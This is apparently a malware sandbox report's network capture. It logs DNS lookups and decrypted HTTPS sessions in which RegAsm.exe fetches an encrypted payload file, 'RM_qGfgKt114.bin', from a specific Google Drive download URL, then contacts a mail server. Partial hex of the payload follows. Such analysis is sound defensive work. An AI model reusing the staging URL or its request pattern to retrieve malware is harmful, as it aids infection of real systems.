                                                                        Oct 14, 2021 10:47:23.828891993 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.829152107 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.829308987 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.829344034 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.829523087 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.829945087 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.830156088 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.830199957 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.830353975 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.830611944 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.830785990 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.830827951 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.830977917 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.831372976 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.831542969 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.831589937 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.831783056 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.832349062 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.832501888 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.832544088 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.832715034 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.832745075 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.832870007 CEST44349796142.250.181.225192.168.11.20
                                                                        Oct 14, 2021 10:47:23.832978010 CEST49796443192.168.11.20142.250.181.225
                                                                        Oct 14, 2021 10:47:23.833019018 CEST44349796142.250.181.225192.168.11.20

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 14, 2021 10:47:22.769853115 CEST5697453192.168.11.201.1.1.1
                                                                        Oct 14, 2021 10:47:22.793199062 CEST53569741.1.1.1192.168.11.20
                                                                        Oct 14, 2021 10:47:23.474787951 CEST5285653192.168.11.201.1.1.1
                                                                        Oct 14, 2021 10:47:23.506088018 CEST53528561.1.1.1192.168.11.20
                                                                        Oct 14, 2021 10:48:59.310488939 CEST5058053192.168.11.201.1.1.1
                                                                        Oct 14, 2021 10:48:59.595242023 CEST53505801.1.1.1192.168.11.20
                                                                        Oct 14, 2021 10:49:04.372673035 CEST5457853192.168.11.201.1.1.1

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Oct 14, 2021 10:47:22.769853115 CEST192.168.11.201.1.1.10x754bStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                        Oct 14, 2021 10:47:23.474787951 CEST192.168.11.201.1.1.10x66afStandard query (0)doc-0g-as-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                        Oct 14, 2021 10:48:59.310488939 CEST192.168.11.201.1.1.10xf0eStandard query (0)mail.tccinfaes.comA (IP address)IN (0x0001)
                                                                        Oct 14, 2021 10:49:04.372673035 CEST192.168.11.201.1.1.10xfcd8Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Oct 14, 2021 10:47:22.793199062 CEST1.1.1.1192.168.11.200x754bNo error (0)drive.google.com172.217.168.46A (IP address)IN (0x0001)
                                                                        Oct 14, 2021 10:47:23.506088018 CEST1.1.1.1192.168.11.200x66afNo error (0)doc-0g-as-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 14, 2021 10:47:23.506088018 CEST1.1.1.1192.168.11.200x66afNo error (0)googlehosted.l.googleusercontent.com142.250.181.225A (IP address)IN (0x0001)
                                                                        Oct 14, 2021 10:48:59.595242023 CEST1.1.1.1192.168.11.200xf0eNo error (0)mail.tccinfaes.comtccinfaes.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 14, 2021 10:48:59.595242023 CEST1.1.1.1192.168.11.200xf0eNo error (0)tccinfaes.com188.93.227.195A (IP address)IN (0x0001)
                                                                        Oct 14, 2021 10:49:04.430510044 CEST1.1.1.1192.168.11.200xfcd8No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • drive.google.com
                                                                        • doc-0g-as-docs.googleusercontent.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.11.2049795172.217.168.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2021-10-14 08:47:22 UTC0OUTGET /uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        2021-10-14 08:47:23 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Thu, 14 Oct 2021 08:47:23 GMT
                                                                        Location: https://doc-0g-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujjgbkrh52f3e2mg4i3inr6at3/1634201175000/11595216098898371304/*/1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP?e=download
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Content-Security-Policy: script-src 'nonce-yr/H8k+kJwlSNjSlUVLUrg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Server: GSE
                                                                        Set-Cookie: NID=511=ttLumQEYvu3CWrAlV003gHXbPhBKbAsldijmUoqmJ3oouAFaD9bgzX4QpTnzCUHvGNfKtL3eI9iEKwgP2rxujpm5lGMnnsajzUJujjrn4JoDIKVT8ZBCG3pkt7Fh6GMV5_v5rRwkMbF9jZ3WnRtME1nmW32Z18XHWq5VUtwT2Ok; expires=Fri, 15-Apr-2022 08:47:23 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Accept-Ranges: none
                                                                        Vary: Accept-Encoding
                                                                        Connection: close
                                                                        Transfer-Encoding: chunked
                                                                        2021-10-14 08:47:23 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 67 2d 61 73 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 72 6e 64 30
                                                                        Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0g-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0
                                                                        2021-10-14 08:47:23 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.11.2049796142.250.181.225443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2021-10-14 08:47:23 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujjgbkrh52f3e2mg4i3inr6at3/1634201175000/11595216098898371304/*/1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP?e=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                        Cache-Control: no-cache
                                                                        Host: doc-0g-as-docs.googleusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2021-10-14 08:47:23 UTC2INHTTP/1.1 200 OK
                                                                        X-GUploader-UploadID: ADPycdt23Sup2gJ_oow6jySZUu_Whc51jlqSRdgG3lgvxACyA8TFOcykN4n6ng5BtktA7AfToKWgxR_9UN6SNI3qZ-7s7bSPkg
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Credentials: false
                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                        Access-Control-Allow-Methods: GET,OPTIONS
                                                                        Content-Type: application/octet-stream
                                                                        Content-Disposition: attachment;filename="RM_qGfgKt114.bin";filename*=UTF-8''RM_qGfgKt114.bin
                                                                        Content-Length: 221760
                                                                        Date: Thu, 14 Oct 2021 08:47:23 GMT
                                                                        Expires: Thu, 14 Oct 2021 08:47:23 GMT
                                                                        Cache-Control: private, max-age=0
                                                                        X-Goog-Hash: crc32c=+KHj9Q==
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Connection: close
                                                                        2021-10-14 08:47:23 UTC5INData Raw: c6 1c c1 74 dd fe 4c 89 5f bd a5 9c 26 86 3c 90 b5 ae 3c a3 b7 8c 8b e6 4e 90 95 8e 87 f4 1b 5d 84 84 a6 09 0f 2f 5f 87 9a cb 6e 50 7a 63 7a 64 2c 95 9f 07 43 23 42 b5 44 83 f6 f2 05 ad 71 cd 57 b4 3e 8e 31 c6 70 a4 eb 37 53 7d df 3a 99 09 33 fe 0f f4 89 8c 46 b5 5a 9a 28 b6 b5 1d ca f4 6b a3 7b 12 6a e8 e3 70 be d3 04 51 71 33 a9 6e 3e 7d a0 da 75 fa 73 46 1e 48 ca 8b 35 52 47 a9 e4 f5 a9 84 67 d4 25 2d b3 8b 1a b8 76 e8 cf 96 96 59 ef 0c b8 c5 12 17 44 07 af a8 89 4d 5a f2 84 2b f5 54 c9 df a0 c8 a6 ee d3 e1 a3 00 b2 5a 37 11 5b 8f d1 ce 1c 67 1a ca b7 53 a8 cb 83 2f 99 b0 3f 39 49 1e 01 92 35 06 b5 b3 1c 34 1e 9e 44 e3 ea 28 01 1e 63 00 d5 eb 81 ed 83 39 9f 72 d1 a1 c4 06 e8 94 0e f4 7d 9e 0f 69 2a da d7 20 3a e6 d8 e7 6b c4 41 85 e5 85 64 23 29 db 96
                                                                        Data Ascii: tL_&<<N]/_nPzczd,C#BDqW>1p7S}:3FZ(k{jpQq3n>}usFH5RGg%-vYDMZ+TZ7[gS/?9I54D(c9r}i* :kAd#)
                                                                        2021-10-14 08:47:23 UTC9INData Raw: 31 da 44 37 0c 65 6c 63 f3 90 b7 96 27 c3 cf a2 c0 c8 66 ff f2 03 74 5e fe 54 36 3b 74 f8 03 f8 04 40 39 f1 ab 00 92 c6 21 1c 8b 1c 2c e7 ed 80 75 82 5a a2 3e 07 2d b5 17 3b 0e dc bf 09 f9 0a 08 48 7d 8a 75 d5 98 78 43 39 cf 89 e2 25 44 b7 2f 12 91 42 7c 30 1e 74 d4 34 51 70 bb f4 91 49 d5 1c 5b 7c 69 ba 21 89 4c 3e 7f 4a a3 e4 89 2d 60 54 9d 14 5f 3e cd f1 ff 8e e2 34 85 9f 40 db d4 dd 68 91 ea e7 1f 5e f9 e1 60 7c 92 be 34 00 18 65 78 ce 96 6e 21 d7 60 43 86 f1 43 c2 ba cb e5 4e 5e fa c2 66 16 5e cf 80 48 b7 d8 8f 72 0f 41 18 ff ab a3 3e e8 0a e4 6d d1 97 63 c7 64 d3 60 ad 9e f7 f5 eb 64 98 3a 2b bc 95 3a 79 d7 37 e0 c0 0d 7d d5 7c 07 fb f5 e8 74 b2 fa 18 0e 06 91 9d 08 72 10 64 67 9f 38 8d ab 3d 4e 23 e2 ec f9 01 78 b8 50 b6 29 bc 82 62 01 0f 76 73 41
                                                                        Data Ascii: 1D7elc'ft^T6;t@9!,uZ>-;H}uxC9%D/B|0t4QpI[|i!L>J-`T_>4@h^`|4exn!`CCN^f^HrA>mcd`d:+:y7}|trdg8=N#xP)bvsA
                                                                        2021-10-14 08:47:23 UTC13INData Raw: 98 ea 75 2c e0 93 3e 02 e7 bf c9 8a fa e0 38 31 7d e6 a7 7c 7a 2a 42 fc c9 e8 25 96 82 e3 18 93 31 f8 a9 cc 58 87 ab b6 c8 f1 67 8c 78 5a 78 9d f0 ec c7 11 7c 3a dc 49 52 84 c8 94 3c cd f5 2e 3d 1a 07 fc 93 21 38 d6 d7 24 dc e3 61 bb e4 94 31 e1 1e 65 29 fa ea 8a e7 a9 72 ac 70 d1 a1 c5 06 e8 9c 0e f4 22 fe 07 42 31 fa d0 37 c4 e7 f4 e5 73 cf 01 82 f3 5b 65 0f 2b ce 9d ea 9f f3 a7 ce a5 80 98 d4 a5 50 20 59 a9 5f 1f 3d d5 7d 5d 91 8f a7 e3 56 41 e7 7f c6 3b fe a5 87 d0 bd 2e 7b ae af 62 38 45 b2 5a 07 85 7e 34 60 40 ae 07 b3 ea 14 3b c9 93 db 0e 21 e9 04 50 76 94 14 e1 a2 5a b5 35 b6 05 6c 26 a5 de 97 0b 48 e4 ab a8 3d ce 5d 4c fa f2 cb af 8c 32 a8 73 5a 75 46 92 bf 05 d4 27 73 5b d2 d0 fd a0 85 3f f5 57 9d aa e6 3d 4e e4 2f 59 06 13 fb 42 1d 70 1e 7a 73
                                                                        Data Ascii: u,>81}|z*B%1XgxZx|:IR<.=!8$a1e)rp"B17s[e+P Y_=}]VA;.{b8EZ~4`@;!PvZ5l&H=]L2sZuF's[?W=N/YBpzs
                                                                        2021-10-14 08:47:23 UTC16INData Raw: 97 cc ef 75 5e f9 84 3e 57 83 9f 1a 4b 77 2b 7e dd b5 40 85 e7 0f 0a 97 d8 61 78 90 87 e1 66 7f 95 92 6c 3e 0a c9 a8 03 a6 f2 a1 a0 5c 41 1e e4 84 e4 d2 ea 0a e8 4e f1 e3 59 cd 4c 8c 0f fe 98 e4 d3 eb 97 98 3a 2b bb 94 3c c6 d5 3d f0 a8 a1 7d d5 76 28 ca a1 e8 72 ab d8 37 dc 5c 91 9b 13 ec 2f 72 e8 b4 3e a5 8d 30 4d 31 d2 c1 a0 01 7e a1 6e 9a 83 ad 87 72 03 21 48 ad 7c ef 0e 33 df be 6d a0 8f c8 94 7d 44 66 c8 69 9c c4 2a 29 69 da 53 cd f7 da 9d a4 34 e1 8b 47 93 4b fe 68 dc 68 b6 76 66 c3 c8 e5 1b 93 f2 65 dc 93 51 86 d3 02 a3 38 04 52 7a c0 c8 a5 92 2c b5 f5 73 c7 6c f2 94 01 a9 7d 65 73 39 93 61 f5 e5 35 3d 4b 3a 59 29 15 b3 57 27 91 e7 0b f2 bf 32 ef ef c8 d4 7d 41 bd c4 bb 62 04 fc ad 67 34 b4 45 d3 35 f7 7a 9d 30 6a 56 59 47 0f 01 12 25 64 0f da 8c
                                                                        Data Ascii: u^>WKw+~@axfl>\ANYL:+<=}v(r7\/r>0M1~nr!H|3m}Dfi*)iS4GKhhvfeQ8Rz,sl}es9a5=K:Y)W'2}Abg4E5z0jVYG%d
                                                                        2021-10-14 08:47:23 UTC18INData Raw: b2 50 12 53 e3 6c 0f 92 af 2f 22 85 dd 31 e1 ee c0 30 4a c0 9f 50 08 90 3c 99 a4 4d 80 20 05 c5 6e 2c 8b d3 bd 0b 42 ca 18 80 3d c4 73 18 ff 9d 1f 87 17 38 80 5d 72 53 4c 86 a3 05 7d 27 73 57 eb 07 4b fe 85 3f d1 57 31 aa e6 3d 75 a0 39 4a 07 13 58 42 1d 70 eb 27 70 85 35 84 a7 cf 4b 9a e9 10 22 3a 1c d5 70 66 8f 0b a2 12 4e d0 72 30 3f cb 77 ce a3 87 98 33 42 5a 1b 0e c3 e4 f3 eb 06 53 2e b0 33 e5 03 ec 7a 40 93 86 3e 4b 61 db e5 56 48 14 6c e3 33 c0 12 a7 47 b0 b3 18 b1 a9 16 c0 b7 9a 26 c4 a3 11 a6 c2 e7 e1 20 3c 17 4f 2d ce 76 eb 46 37 00 1b a3 29 d3 c7 b1 9e 42 bc a8 a0 ca 12 66 f9 f0 03 74 45 27 29 cc 0c 74 f2 21 00 28 42 3f df 8f 2a aa c0 4e 6e 55 1c 20 e5 85 82 75 85 5a de 3e 05 27 e4 39 2d 81 da 68 84 f9 0a 08 62 4a d3 75 9d 17 6b 4e 11 f7 89 e2
                                                                        Data Ascii: PSl/"10JP<M n,B=s8]rSL}'sWK?W1=u9JXBp'p5K":pfNr0?w3BZS.3z@>KaVHl3G& <O-vF7)BftE')t!(B?*NnU uZ>'9-hbJukN
                                                                        2021-10-14 08:47:23 UTC19INData Raw: 6d 6b 38 04 58 6d 0d cd fa 83 24 da 3c 73 86 61 e5 6a 0c f6 44 53 68 39 93 1e fb e5 35 39 77 15 9b 2b 1b b7 7f ed cf ee 01 b2 3b 32 ef ef c3 d1 55 2b bf c4 bd 4a aa f7 ad 61 20 39 50 d3 4e ff 69 dd 2e 2a 40 71 99 0d 01 15 2d 4c cb d8 06 28 d4 38 28 1a 13 fb 5a 36 48 38 ab 03 c7 90 e3 35 55 6c 42 6c dc 1a 49 a7 8e 32 c8 70 a4 ef 82 5a 7d 20 ca 99 09 8b e4 0f f4 88 8c 46 b5 1a 5e 21 b6 b5 13 ca f4 6b 71 72 12 6a e7 e3 70 be c9 04 51 70 33 a9 6e 3e 9c a9 da 75 f4 73 46 1e a7 c3 8b b5 5d 47 a9 ea f0 13 8a 66 60 2c e0 92 cd 12 f4 bb c7 9b fe ff 26 c5 7c ca a6 75 65 25 70 8f cb e9 23 34 9d f0 13 9d 31 e9 a3 d5 a6 86 a1 b7 c1 e7 40 e1 7a 5a 64 3f ea fe c3 11 6d 3e ff bd 53 a8 c5 83 2f c9 b6 35 39 05 10 02 92 0d 20 fd d2 1d 34 1e 9e 44 b1 e0 28 e1 0d 61 01 de 8f
                                                                        Data Ascii: mk8Xm$<sajDSh959w+;2U+Ja 9PNi.*@q-L(8(Z6H85UlBlI2pZ} F^!kqrjpQp3n>usF]Gf`,&|ue%p#41@zZd?m>S/59 4D(a
                                                                        2021-10-14 08:47:23 UTC20INData Raw: 4c ee fd 55 98 cd 05 4f a2 29 89 a7 ce 5b bd 4c 11 a2 e0 b7 ff 2b 36 b2 48 93 d5 72 8f 53 3c 06 be ac 97 fa 90 b3 b5 4d ac b3 5d 35 eb 48 fb f0 03 72 47 10 44 1e 95 74 f8 09 f7 2a 42 28 e1 b2 2c 92 46 21 16 55 1c 3b c9 f4 7e 74 af 77 b4 32 1f 3e c8 17 3c 85 cb 4b 08 d5 09 10 59 79 d3 64 93 1b 86 48 15 c6 a1 d1 25 44 bd 22 a6 2f 46 6e 3b 1a 6e 2b 2e 4d 70 90 b5 8b 5a d1 09 4a 78 63 46 08 ec 4b 37 7d a4 9b f8 9a 28 6a 43 b1 43 a1 3f eb 9b a3 a4 fc 2d 87 88 3e 93 c8 23 63 bb db c0 3e 33 f9 8e 27 7e fd 44 32 17 7d 07 65 d3 8f 6c 3e f4 0b 1a 78 f0 65 c7 85 94 e3 4e 49 91 8c 98 17 78 cb 83 00 8d a3 76 e2 a1 49 0f 23 a1 c4 65 66 bd dc c9 c0 c9 59 c7 64 c9 3f fa 9e 70 fd c3 2a b2 3a 2d bb 95 cd 7b d7 3b fc f3 58 7c d5 7a 13 93 df f2 74 b8 f2 33 30 4f 96 e3 19 c5
                                                                        Data Ascii: LUO)[L+6HrS<M]5HrGDt*B(,F!U;~tw2><KYydH%D"/Fn;n+.MpZJxcFK7}(jCC?->#c>3'~D2}el>xeNIxvI#efYd?p*:-{;X|zt30O
                                                                        2021-10-14 08:47:23 UTC22INData Raw: 88 33 77 fa 75 29 66 48 ca 81 bf 4f 4b a9 e2 f5 03 74 66 4c 27 e7 89 4d 02 f4 bb cd 39 e1 ee 26 cf 74 d5 a0 8b 64 09 60 93 46 fd 23 34 9c fb 14 9c 3d e9 a5 ce 58 87 ab ae c7 cf a8 e3 7a 5c 56 d7 e8 ff c5 7e 15 3e ca bd 59 b4 c7 83 27 d0 0b 3e 15 16 19 2a 71 0f 3a fb fa f8 36 1e 98 2b 9b ea 28 eb 14 7b 0d de e2 95 e2 7d 60 b0 75 d6 b3 c2 a4 f7 84 02 f4 3b fe f2 68 06 f8 c0 2c 3a ee c7 f5 95 c5 2d 87 ce a0 5c 53 d7 26 69 c0 83 db 5d cf 42 82 b3 d6 a4 b3 08 3d a9 77 e6 3f fd ec 32 a5 85 8f 9f 3b 74 e1 57 57 31 23 1c 98 da 31 54 53 99 ae 4a a9 49 b0 78 e7 8f f2 61 73 44 8f 2f 2c ea 14 bc 9a e4 d9 0f 2a 11 e3 50 76 9f 14 8d a0 5a b9 35 2d 04 6c 26 84 75 20 d3 fa df 35 be 36 d5 71 66 f9 f3 cd 8d 1e 23 ad 6b 73 7b 07 92 b5 2b 69 20 05 3d 1d a6 71 ff 84 17 e0 7f
                                                                        Data Ascii: 3wu)fHOKtfL'M9&td`F#4=Xz\V~>Y'>*q:6+({}`u;h,:-\S&i]B=w?2;tWW1#1TSJIxasD/,*PvZ5-l&u 56qf#ks{+i =q
                                                                        2021-10-14 08:47:23 UTC23INData Raw: 99 76 2e bb dc e5 e1 97 ca c7 4a 4d fd 8e 3c 78 8e 4a 33 3b 72 3c 52 d3 8f 6c 3e f4 0b 15 78 f0 65 cb 84 f9 c2 4e 58 91 1c d1 01 8e c4 a4 1f a6 dc 89 0c 5a 59 e6 f4 81 df 12 ca 0a ee 62 fe 1c 59 c7 6e bd 62 fe 9e fd f5 da 39 9e 3a 3c ae a6 ea 78 fb 26 f0 ef 81 7c d5 76 7e b1 a1 e8 70 b0 6c 09 49 70 91 9d 08 d3 f9 b3 c6 a9 24 9e ae 30 5c 3f ec 61 a1 2d 7b a5 50 b6 3e be 83 69 ec 09 4c fd 55 ea 30 72 07 41 92 a2 b0 40 98 75 4b 44 23 57 77 c6 2a 2f 7e fb 7d de 7d cc b3 ae 0a cc 98 50 aa 0a 91 a1 da e8 9c 61 98 c5 be ae d2 93 f6 43 f5 13 70 e6 d5 69 7d 0b 1c 26 48 3e ca fe 0d 9d cc 0d 5f ef 2c e5 6a 05 db 41 8e 21 3e 93 1f d0 fb 4b 1a 27 12 9f 33 26 a3 01 c8 91 e7 05 3c 83 24 de e3 f1 9a 55 2a b9 e9 b8 97 f4 f9 ad 61 06 70 50 d3 33 f4 77 9d ca 2a 40 71 fd 00
                                                                        Data Ascii: v.JM<xJ3;r<Rl>xeNXZYbYnb9:<x&|v~plIp$0\?a-{P>iLU0rA@uKD#Ww*/~}}PaCpi}&H>_,jA!>K'3&<$U*apP3w*@q
                                                                        2021-10-14 08:47:23 UTC24INData Raw: b0 08 2c a9 40 6e 0c e4 98 55 91 85 8b bd 5f 42 e1 51 75 1f fe af 92 5a 39 71 7b aa 73 a1 a1 45 b2 52 07 f7 c1 72 1e 48 af 2f 2c c2 18 32 e1 e2 f1 2a 27 c1 95 d0 7e 9e 3c 9d 7d 97 b1 1d 2d 07 73 55 be e2 e9 03 42 cc 34 80 30 c7 75 0f d0 d6 cd 87 1d b2 a0 79 72 57 9b 3d b7 2d 4f 25 6c 2b fe c3 0f f7 85 3f f0 57 08 a9 e6 31 4e b9 2d 59 0a bb 68 42 1d 7e eb 93 73 85 35 f8 b6 b4 78 87 8f 58 be 3a 18 fd 64 e8 9a 0d 8a 37 5d 90 69 f0 21 e3 b8 c8 7e f2 38 22 02 4f 7a 39 f0 fd 89 cb 43 51 2a 9e 41 b0 01 ea 54 0b eb 86 34 c1 cb ca a5 4a bd 19 6c e3 35 4a 07 e7 5e 9e a5 11 b0 a3 0f ed ae d9 58 d8 8b 15 a2 ea 9b 8e 29 37 b5 54 02 de 5f 8d 4e 21 f8 b8 ed 6b e4 ae 4f 9f 5e 6a ce fd c8 34 ea d1 f0 03 8c 55 36 b8 1f 53 76 d8 ac d0 2a 42 c7 f6 b7 d6 ab 99 0d 7c 57 90 55
                                                                        Data Ascii: ,@nU_BQuZ9q{sERrH/,2*'~<}-sUB40uyrW=-O%l+?W1N-YhB~s5xX:d7]i!~8"Oz9CQ*AT4Jl5J^X)7T_N!kO^j4U6Sv*B|WU
